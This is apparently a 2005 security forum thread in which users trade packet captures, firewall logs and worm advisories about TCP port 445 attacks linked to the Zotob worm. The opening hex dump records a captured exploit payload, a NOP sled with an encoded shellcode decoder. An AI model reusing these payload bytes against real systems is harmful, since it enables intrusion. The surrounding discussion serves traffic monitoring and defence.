67 15 7A 76 EB 08 90 90 67 15 7A 76 ....g.zv....g.zv F0 EB 08 90 90 67 15 7A 76 EB 08 90 90 67 15 7A 76 ....g.zv....g.zv 100 EB 08 90 90 67 15 7A 76 EB 08 90 90 67 15 7A 76 ....g.zv....g.zv 110 90 90 90 90 90 90 90 EB 08 90 90 48 4F 44 88 90 ...........HOD.. 120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 130 29 C9 83 E9 B0 D9 EE D9 74 24 F4 5B 81 73 13 19 ).......t$.[.s.. 140 F5 04 37 83 EB FC E2 F4 E5 9F EF 7A F1 0C FB C8 ..7........z.... 150 E6 95 8F 5B 3D D1 8F 72 25 7E 78 32 61 F4 EB BC ...[=..r%~x2a... 160 56 ED 8F 68 39 F4 EF 7E 92 C1 8F 36 F7 C4 C4 AE V..h9..~...6.... 170 B5 71 C4 43 1E 34 CE 3A 18 37 EF C3 22 A1 20 1F .q.C.4.:.7..". . 180 6C 10 8F 68 3D F4 EF 51 92 F9 4F BC 46 E9 05 DC l..h=..Q..O.F... 190 1A D9 8F BE 75 D1 18 56 DA C4 DF 53 92 B6 34 BC ....u..V...S..4. 1A0 59 F9 8F 47 05 58 8F 77 11 AB 6C B9 57 FB E8 67 Y..G.X.w..l.W..g 1B0 E6 23 62 64 7F 9D 37 05 71 82 77 05 46 A1 FB E7 .#bd.7.q.w.F... 1C0 71 3E E9 CB 22 A5 FB E1 46 7C E1 51 98 18 0C 35 q>.."...F|.Q...5 1D0 4C 9F 06 C8 C9 9D DD 3E EC 58 53 C8 CF A6 57 64 L......>.XS...Wd 1E0 4A A6 47 64 5A A6 FB E7 7F 9D 14 8B 7F A6 8D D6 J.GdZ......... 1F0 8C 9D A0 2D 69 32 53 C8 CF 9F 14 66 4C 0A D4 5F ...-i2S....fL.._ 200 BD 58 2A DE 4E 0A D2 64 4C 0A D4 5F FC BC 82 7E .X*.N..dL.._...~ 210 4E 0A D2 67 4D A1 51 C8 C9 66 6C D0 60 33 7D 60 N..gM.Q..fl.`3}` 220 E6 23 51 C8 C9 93 6E 53 7F 9D 67 5A 90 10 6E 67 .#Q...nS.gZ..ng 230 40 DC C8 BE FE 9F 40 BE FB C4 C4 C4 B3 0B 46 1A @.....@.......F. 240 E7 B7 28 A4 94 8F 3C 9C B2 5E 6C 45 E7 46 12 C8 ..(...<..^lE.F.. 250 6C B1 FB E1 42 A2 56 66 48 A4 6E 36 48 A4 51 66 l...B.VfH.n6H.Qf 260 E6 25 6C 9A C0 F0 CA 64 E6 23 6E C8 E6 C2 FB E7 .%l....d.#n..... 270 92 A2 F8 B4 DD 91 FB E1 4B 0A D4 5F F6 3B E4 57 ........K.._.;.W 280 4A 0A D2 C8 C9 F5 04 37 90 90 90 90 90 90 90 90 J......7........ 290 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 2A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 2B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 2C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 2D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 2E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 2F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 300 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 310 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 320 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 330 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 340 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 350 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 360 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 370 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 380 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 390 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 3A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 3B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 3C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 3D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 3E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 3F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 400 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 410 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 420 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 430 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 450 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 460 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 470 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 480 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 490 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 4A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 4B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 4C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 4D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 4E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 4F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 500 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 510 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 520 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 530 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 540 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 550 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 560 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 570 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 580 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 590 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 5A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 5B0 90 90 90 90 ....
68.144.64.230 : 3421 TCP Data In Length 736 bytes MD5 = E691C88EB51C6E64D51854BF50140314 ---- 15/08/2005 01:51:54.228 0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 20 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 30 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 40 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 50 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 60 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 70 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 80 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 100 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 110 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 130 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 140 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 150 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 160 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 170 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 180 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 190 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 1A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 1B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 1C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 1D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 1E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 1F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 200 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 210 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 220 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 230 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 240 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 250 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 260 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 270 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 280 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 290 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 2A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 2B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 2C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 2D0 90 90 90 90 E0 07 00 00 04 00 00 00 00 00 00 00 ................ Blake |
|
Mark75 Premium Member join:2001-11-15 Phoenix, AZ 3 edits |
to Link Logger
03:04:11 Drop TCP packet from WAN 71.114.32.235:3377 71.114.86.x:445 Rule: Bad deny 03:03:32 Drop TCP packet from WAN 68.206.76.231:3952 71.114.86.x:445 Rule: Bad deny 02:57:59 Drop TCP packet from WAN 71.114.2.132:1200 71.114.86.x:445 Rule: Bad deny 02:57:55 Drop TCP packet from WAN 71.114.2.132:1200 71.114.86.x:445 Rule: Bad deny 02:57:40 Drop TCP packet from WAN 71.114.98.14:3385 71.114.86.x:445 Rule: Bad deny 02:57:36 Drop TCP packet from WAN 71.114.98.14:3385 71.114.86.x:445 Rule: Bad deny 02:53:43 Drop TCP packet from WAN 71.114.178.114:4195 71.114.86.x:445 Rule: Bad deny 02:53:39 Drop TCP packet from WAN 71.114.178.114:4195 71.114.86.x:445 Rule: Bad deny 02:52:08 Drop TCP packet from WAN 71.114.57.180:2968 71.114.86.x:445 Rule: Bad deny 02:52:04 Drop TCP packet from WAN 71.114.57.180:2968 71.114.86.x:445 Rule: Bad deny That's just a sample of what I get 24/7. As far as trends go: I've noticed a shift from primarily 135 with a few 445 thrown in to to a fair mix of both 135 and 445. The infected system almost always attempts the exploit twice, waiting approximately 4 seconds in between attempts. I'd say 90-95% are from the same /16. If you look at the above log, you'll notice the only one that doesn't come from Verizon's network is 68.206.76.231 and that it was a simple attempt only. I'd bet he was actively scanning, not infected himself. I'd say 1% of attempts fall in that category. It's unfortunate that ISPs do nothing about these blatently infected systems. |
|
deadi Premium Member join:2001-08-26 Perry, OH |
to Link Logger
http://isc.sans.org/
Has some info on the latest 445 vulnerabilty:
F-Secure is reporting a new variant in the Zotob worm currently exploiting the PnP vulnerability addressed in MS05-039. The Zotob.B variant uses the same ports (TCP/445 for scanning, TCP/8888 command shell on exploited systems, TCP/33333 for FTP server) as the previous variant, but uses the executable name "csm.exe" with the description "csm Win Updates" in the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices to load the worm when the system boots. The Zotob.A uses the executable name "botzor.exe" in the same registry key.
It is not believed that Zotob.B worm possesses any additional characteristics that would make it more of a threat compared to Zotob.A. |
|
1 edit |
I have seen an increase of 445 traffic by about 60 - 70%, but almost 94% of it is from my local netblock which would tend to indicate that what is attacking 445 here was an email borne virus as with such tight local scanning it wouldn't spread very well breadth wise on the internet. I have attached a number of graphs so people can see what 445 attack rates I'm seeing here. Of course your mileage may vary. Blake Edit -> one thing that I am interested in is the 143 traffic, anyone else seeing scans to TCP port 143? I did see one scan to TCP Port 8888 on Saturday night which was interesting given the release of information concerning TCP Port 8888 lately: Aug 13, 2005 23:23:11.031 - (TCP) 222.156.78.106 : 2623 >>> 68.144.129.205 : 8888 Aug 13, 2005 23:23:07.984 - (TCP) 222.156.78.106 : 2623 >>> 68.144.129.205 : 8888 |
|
Link Logger |
Perhaps this is having more of an effect then I first thought. From another IP address that I monitor I can see that the scans have gone up and such but what is more interesting is that I typically see TCP port 445 attacks from about 270 different IP addresses per day (ie the attached chart from the 8th shows 2096 attacks from 270 addresses), on Monday I saw 7077 TCP port 445 attacks from 498 different sources, so the victim pool has almost been doubled which is significant and even more so considering the email version hasn't been released as sometimes I think there are more insane users who blindly click on attachments then vulnerable systems. I wish I had some more time to look at everything as there appears to be a couple of interesting things going on in terms of TCP port 445 attacks. I'll see what I can figure out and post my findings as I get them. Blake |
|